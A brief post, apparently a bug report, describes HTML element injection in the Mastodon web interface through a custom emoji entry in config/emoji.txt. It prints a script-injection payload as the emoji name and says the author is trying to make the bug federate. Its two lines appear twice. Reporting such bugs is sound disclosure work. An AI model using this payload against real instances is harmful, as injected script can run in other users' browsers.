html element injection in mastodon UI using custom emoji
triggered with the line in config/emoji.txt
"><script>alert("hax")</script>", /emoji/hax.svg
i think I can federate the bug but haven't succeeded yet.
triggered with the line in config/emoji.txt
"><script>alert("hax")</script>", /emoji/hax.svg
i think I can federate the bug but haven't succeeded yet.